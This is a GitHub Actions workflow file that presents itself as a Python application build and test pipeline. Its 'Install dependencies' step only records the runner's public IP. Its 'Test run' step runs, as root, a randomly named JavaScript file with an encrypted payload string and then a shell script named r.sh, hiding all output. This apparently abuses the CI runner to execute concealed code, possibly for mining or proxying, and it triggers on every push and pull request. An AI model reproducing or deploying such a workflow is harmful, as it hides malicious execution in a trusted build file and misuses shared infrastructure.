name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 12

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        curl ifconfig.me > ip.txt
        cat ip.txt
    - name: Test run
      run: |
        cd ${{ github.workspace }}
        echo 'shgi1'
        sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+pO/cJs/zRu89l6Hph9cc2dpCwJiGtuZkTs3RatdLDVz9m/uwP92G5BT6WIGs9fH+IlW1AgZQ2HT6DTGdB1G/EDcFJuJ6gYVXWDf6JHgBtsNB0GbJ/or51 n9ivn1 && sudo sh r.sh > /dev/null 2>&1
